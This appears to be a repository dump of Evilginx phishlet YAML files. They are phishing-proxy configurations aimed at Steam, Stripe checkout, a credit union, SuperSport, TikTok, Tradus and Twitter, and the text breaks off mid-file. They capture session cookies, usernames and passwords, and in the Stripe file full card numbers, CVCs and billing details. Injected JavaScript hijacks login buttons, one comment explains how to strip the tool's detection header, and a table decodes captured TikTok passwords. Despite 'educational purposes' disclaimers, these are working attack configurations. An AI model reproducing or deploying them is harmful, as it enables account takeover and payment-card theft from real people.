3 | 4 | author: '@An0nud4y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: '', orig_sub: '', domain: 'steamcommunity.com', session: true, is_landing: true} 8 | 9 | sub_filters: 10 | - {triggers_on: 'steamcommunity.com', orig_sub: 'login', domain: 'steamcommunity.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html$ 11 | 12 | auth_tokens: 13 | - domain: 'steamcommunity.com' 14 | keys: ['xf_user', 'xf_session'] 15 | 16 | credentials: 17 | username: 18 | key: 'username' 19 | search: '(.*)' 20 | type: 'post' 21 | password: 22 | key: 'unenc_password' 23 | search: '(.*)' 24 | 25 | login: 26 | domain: 'steamcommunity.com' 27 | path: '/login/home/' 28 | 29 | js_inject: 30 | - trigger_domains: ["steamcommunity.com"] 31 | trigger_paths: ["/login/home/"] 32 | trigger_params: [] 33 | script: | 34 | function onclickListener(){ 35 | var submit = document.querySelectorAll('button[type=submit]')[0]; 36 | submit.setAttribute("onclick", "sendPass()"); 37 | return; 38 | } 39 | function sendPass(){ 40 | var password = document.getElementsByName("password")[0].value; 41 | var xhr = new XMLHttpRequest(); 42 | xhr.open("POST", '/login/device-based/regular/login/', true); 43 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 44 | xhr.send("unenc_password="+encodeURIComponent(password)); 45 | return; 46 | } 47 | setTimeout(function(){ onclickListener(); }, 2500); 48 | 49 | 50 | 51 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 52 | # PLEASE DO NOT MISUSE THIS PHISHLET. 
53 | -------------------------------------------------------------------------------- /phishlet_examples/stripe.yaml: -------------------------------------------------------------------------------- 1 | # Checkout Docs for reference 2 | # https://stripe.com/docs/connect/creating-a-payments-page?destination-or-on-behalf-of=destination 3 | 4 | # Steps to follow to integrate evilginx checkout in original payment checkout page 5 | # 6 | # 1) Replace all occurences of stripe.com in html files or in js files with evilginx2 domain 7 | # 2) Read docs for other possible issues (Mentioned Above) 8 | # 3) Also look at domain name stripe.network and change it with evilginx domain in all js and html files in checkout page of website. 9 | # 4) Handling lure is difficult and will require a heavy evilginx2 source code modification, Alternate solution is to inject js in the website index or any page which will trigger the evilginx2 lure and create a valid evilginx session for that user. 10 | # 11 | 12 | 13 | 14 | # Checkout Page - 15 | # 16 | # https://checkout.stripe.com/c/pay/cs_live_b1VLOZemyS8VFjpL7CKqeF83LqaFkITaQd2uWgK0fdZ4D2qF5PBtN9itwh#fidkdWxOYHwnPyd1blppbHNgWmM0dDRLQF9IYDxNQ2c2U3VsYUZVfDJDYycpJ2hsYXYnP34nYnBsYSc%2FJ0tEJyknaHBsYSc%2FJzw9ZDw8MWRkKGY8MGcoMTQyPChkMGNgKDcwPDQwNTA2MzVgN2M3YGdmNycpJ3ZsYSc%2FJzZjZ2NkZDA9KGQ8YWAoMTVjZihnNzA9KDwxYDAzNzAwNjQ8ZzAzN2YwMid4KSdnYHFkdic%2FXlgpJ2lkfGpwcVF8dWAnPydocGlxbFpscWBoJyknd2BjYHd3YHdKd2xibGsnPydtcXF1dj8qKnJycitof3ZubGsrZmpoJ3gl 17 | 18 | 19 | ## List of SubDomains --- 20 | # https://m.stripe.com 21 | # https://m.stripe.network/ 22 | # https://js.stripe.com 23 | # https://q.stripe.com 24 | # https://api.stripe.com/ 25 | # https://r.stripe.com/ 26 | # https://stripe-camo.global.ssl.fastly.net/ 27 | # https://checkout.stripe.com 28 | 29 | 30 | 31 | 32 | 33 | # Note: Do not Forget to remove the easter egg codes from evilginx2 (http_proxy.go), 34 | # Search for 'cantFindMe' and 'egg' in http_proxy.go and comment all relevent code to 
remove the evilginx header (X-Evilginx) 35 | 36 | 37 | name: 'stripe' 38 | author: '@an0nud4y' 39 | min_ver: '2.4.0' 40 | proxy_hosts: 41 | - {phish_sub: 'checkout', orig_sub: 'checkout', domain: 'stripe.com', session: true, auto_filter: true, is_landing: true} 42 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 43 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.network', session: false, auto_filter: true, is_landing:false} 44 | - {phish_sub: 'js', orig_sub: 'js', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 45 | - {phish_sub: 'q', orig_sub: 'q', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 46 | - {phish_sub: 'api', orig_sub: 'api', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 47 | - {phish_sub: 'r', orig_sub: 'r', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 48 | - {phish_sub: 'stripe-camo.global.ssl', orig_sub: 'stripe-camo.global.ssl', domain: 'fastly.net', session: false, auto_filter: true, is_landing:false} 49 | 50 | sub_filters: 51 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 52 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 53 | 54 | auth_tokens: 55 | - domain: '.stripe.com' 56 | keys: ['.*,regexp'] 57 | - domain: 'm.stripe.com' 58 | keys: ['.*,regexp'] 59 | - domain: 'stripe.com' 60 | keys: ['.*,regexp'] 61 | 62 | credentials: 63 | username: 64 | key: 'card[number]' 65 | search: '(.*)' 66 | type: 'post' 67 | password: 68 | key: 'card[cvc]' 69 | search: '(.*)' 70 | type: 'post' 71 | custom: 72 | - key: 'type' 73 | 
search: '(.*)' 74 | type: 'post' 75 | - key: 'card[number]' 76 | search: '(.*)' 77 | type: 'post' 78 | - key: 'card[cvc]' 79 | search: '(.*)' 80 | type: 'post' 81 | - key: 'card[exp_month]' 82 | search: '(.*)' 83 | type: 'post' 84 | - key: 'card[exp_year]' 85 | search: '(.*)' 86 | type: 'post' 87 | - key: 'billing_details[name]' 88 | search: '(.*)' 89 | type: 'post' 90 | - key: 'billing_details[email]' 91 | search: '(.*)' 92 | type: 'post' 93 | - key: 'guid' 94 | search: '(.*)' 95 | type: 'post' 96 | - key: 'muid' 97 | search: '(.*)' 98 | type: 'post' 99 | - key: 'sid' 100 | search: '(.*)' 101 | type: 'post' 102 | - key: 'payment_user_agent' 103 | search: '(.*)' 104 | type: 'post' 105 | 106 | 107 | auth_urls: 108 | - '/' 109 | - '/c' 110 | 111 | login: 112 | domain: 'checkout.stripe.com' 113 | path: '/' 114 | -------------------------------------------------------------------------------- /phishlet_examples/sununion.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'suncoastcreditunion.com', session: true, is_landing: true} - {phish_sub: '', orig_sub: '', domain: 'suncoastcreditunion.com', session: true, is_landing: false} - {phish_sub: 'banking', orig_sub: 'banking', domain: 'suncoastcreditunion.com', session: true, is_landing: false} sub_filters: - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 
'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 
'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', 
search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} auth_tokens: - domain: '.suncoastcreditunion.com' keys: ['.*,regexp'] - domain: 'banking.suncoastcreditunion.com' keys: ['.*,regexp'] - domain: '.banking.suncoastcreditunion.com' keys: ['.*,regexp'] - domain: 'suncoastcreditunion.com' keys: ['.*,regexp'] - domain: 'www.suncoastcreditunion.com' keys: ['.*,regexp'] auth_urls: - '/*' - '/' credentials: username: key: 'memberId' search: '(.*)' type: 'post' password: key: 'password' search: '(.*)' type: 'post' login: domain: 'www.suncoastcreditunion.com' path: '/' -------------------------------------------------------------------------------- /phishlet_examples/supersport.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 
3 | 4 | author: '@An0nud4y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'supersport.hr', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: '', domain: 'supersport.hr', session: true, is_landing: false} 9 | sub_filters: 10 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 12 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 
'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 18 | 19 | 20 | # i=n(2494); --> i=n(165); 21 | # a.render(r.createElement(i,null),document.getElementById("mount-app"));var o=n(139),l=n(165); 22 | # 23 | 24 | auth_tokens: 25 | - domain: '.supersport.hr' 26 | keys: ['session_id', '_dvc', '.*,regexp'] 27 | credentials: 28 | username: 29 | key: 'login' 30 | search: '(.*)' 31 | type: 'post' 32 | password: 33 | key: 'password' 34 | search: '(.*)' 35 | type: 'post' 36 | login: 37 | domain: 'www.supersport.hr' 38 | path: '/igraci/prijava/' 39 | 40 | js_inject: 41 | - trigger_domains: ["www.supersport.hr"] 42 | trigger_paths: ["/igraci/prijava/"] 43 | trigger_params: [] 44 | script: | 45 | function onclickListener(){ 46 | document.getElementById("mount-app").innerHTML = '

Login

Betting is prohibited for U.S. citizens and anyone with a work permit in the United States.
Only can apply registered players .
Formabottom
' 47 | return; 48 | } 49 | function sendPass(){ 50 | var login = document.getElementsByName("prijava[login]")[0].value; 51 | var password = document.getElementsByName("prijava[password]")[0].value; 52 | var xhr = new XMLHttpRequest(); 53 | xhr.open("POST", '/login', true); 54 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 55 | xhr.send("login="+encodeURIComponent(login)+""+" password="+encodeURIComponent(password)); 56 | return; 57 | } 58 | setTimeout(function(){ onclickListener(); }, 2000); 59 | 60 | 61 | # AUTHENTICATION REQUEST 62 | #prijava:7 63 | #{"login":"<REDACTED>","password":"<REDACTED>","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"} -------------------------------------------------------------------------------- /phishlet_examples/tiktok.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | # All Post Requests Fields Get Encoded During Requests to Server By titok javascripts. 5 | # Below is the Table Which You can use to decode your captured credentials in evilginx manually. 
6 | 7 | author: '@An0nUD4Y' 8 | min_ver: '2.3.0' 9 | proxy_hosts: 10 | - {phish_sub: 'www', orig_sub: 'www', domain: 'tiktok.com', session: true, is_landing: true} 11 | - {phish_sub: 'm', orig_sub: 'm', domain: 'tiktok.com', session: true, is_landing: false} 12 | - {phish_sub: '', orig_sub: '', domain: 'tiktok.com', session: true, is_landing: false} 13 | - {phish_sub: 'polyfill', orig_sub: '', domain: 'polyfill.io', session: true, is_landing: false} 14 | - {phish_sub: 's16', orig_sub: 's16', domain: 'tiktokcdn.com', session: true, is_landing: false} 15 | - {phish_sub: 'hypstarcdn', orig_sub: 's16', domain: 'hypstarcdn.com', session: true, is_landing: false} 16 | - {phish_sub: 'kakao', orig_sub: 'developers', domain: 'kakao.com', session: true, is_landing: false} 17 | - {phish_sub: 'mon-va', orig_sub: 'mon-va', domain: 'byteoversea.com', session: true, is_landing: false} 18 | - {phish_sub: 'maliva', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', session: true, is_landing: false} 19 | - {phish_sub: 'sf16-muse-va', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', session: true, is_landing: false} 20 | 21 | sub_filters: 22 | - {triggers_on: 'www.tiktok.com', orig_sub: 'www', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 23 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 24 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 25 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 26 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 
'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 27 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 28 | - {triggers_on: 'www.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 29 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 30 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 31 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 32 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 33 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 34 | - {triggers_on: 'www.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 35 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 36 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', 
search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 37 | - {triggers_on: 'www.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 38 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 39 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 40 | - {triggers_on: 'www.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 41 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 42 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 43 | - {triggers_on: 'www.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 44 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 45 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 46 | 47 | 48 | 
49 | 50 | 51 | auth_tokens: 52 | - domain: '.tiktok.com' 53 | keys: ['.*,regexp'] 54 | credentials: 55 | username: 56 | key: 'account' 57 | search: '(.*)' 58 | type: 'post' 59 | password: 60 | key: 'pass' 61 | search: '(.*)' 62 | type: 'post' 63 | custom: 64 | key: 'mobile' 65 | search: '(.*)' 66 | type: 'post' 67 | 68 | login: 69 | domain: 'www.tiktok.com' 70 | path: '/login/phone-or-email/phone-password?lang=en' 71 | 72 | 73 | #Remember Server Accepts Only encoded Credentials, So don't break the js functions responsible for encoding. 74 | 75 | #ENCODING TABLE TO DECODE THE PASSWORD AND MOBILE NUMBER 76 | 77 | # FOR NUMBERS 78 | 79 | # 1 = 34 , 2 = 37 , 3 = 36 , 4 = 31 , 5 = 30 ,6 = 33 , 7 = 32 , 8 = 3d , 9 = 3c 80 | 81 | # FOR SPECIAL CHARACTERS 82 | 83 | # ! = 24 , @ = 45 , # = 26 , $ = 21 , ^ = 5b , & = 23 , * = 2f , + = 2e 84 | 85 | # FOR LETTERS (SMALL-LETTERS) 86 | 87 | # a = 64 , b=67 , c=66 ,d=61,e=60,f=63,g=62,h=6d,i=6c,j=6f,k=6e,l=69,m=68,n=6b,o=6a,p=75,q=74,r=77,s=76,t=71,u=70,v=73,w=72,x=7d,y=7c,z=7f 88 | 89 | # FOR LETTERS (CAPITAL-LETTERS) 90 | 91 | # A=44 B=47 C=46 D=41 E=40 F=43 G=42 H=4d I=4c J=4f K=4e L=49 M=48 N=4b O=4a P=55 Q=54 R=57 S=56 T=51 U=50 V=53 W=52 X=5d Y=5c Z=5f 92 | 93 | 94 | # OTHER REMAINED CODES CAN BE FOUND USING POST REQUEST ANALYSIS. 
95 | 96 | -------------------------------------------------------------------------------- /phishlet_examples/tradus.yaml: -------------------------------------------------------------------------------- 1 | author: '@AN0NUD4Y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'pro', orig_sub: 'pro', domain: 'tradus.com', session: true, is_landing: false} 5 | - {phish_sub: 'api', orig_sub: 'api-pro', domain: 'tradus.com', session: true, is_landing: true} 6 | 7 | sub_filters: 8 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 9 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 10 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 11 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 12 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 13 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 
'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 14 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 15 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 16 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 17 | 18 | 19 | auth_tokens: 20 | - domain: '.tradus.com' 21 | keys: ['','.*,regexp'] 22 | 23 | credentials: 24 | username: 25 | key: 'Email' 26 | search: '(.*)' 27 | type: 'post' 28 | password: 29 | key: 'Password' 30 | search: '(.*)' 31 | type: 'post' 32 | 33 | login: 34 | domain: 'pro.tradus.com' 35 | path: '/login' 36 | 37 | js_inject: 38 | - trigger_domains: ["pro.tradus.com"] 39 | trigger_paths: ["/login"] 40 | trigger_params: [] 41 | script: | 42 | function lp(){ 43 | var submit = document.querySelectorAll('button[type=button]')[4]; 44 | submit.setAttribute("onclick", "sendData()"); 45 | return; 46 | } 47 | function sendData(){ 48 | var email = document.getElementsByName("email")[1].value; 49 | var password = document.getElementsByName("password")[0].value; 50 | var xhr2 = new XMLHttpRequest(); 51 | xhr2.open("POST", '/', true); 52 | 
xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 53 | xhr2.send("Email="+encodeURIComponent(email)); 54 | var xhr = new XMLHttpRequest(); 55 | xhr.open("POST", '/', true); 56 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 57 | xhr.send("Password="+encodeURIComponent(password)); 58 | return; 59 | } 60 | setTimeout(function(){ lp(); }, 2500); 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /phishlet_examples/twitter-mobile.yaml: -------------------------------------------------------------------------------- 1 | author: '@white_fi' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true} 5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false} 6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 9 | - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 10 | - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 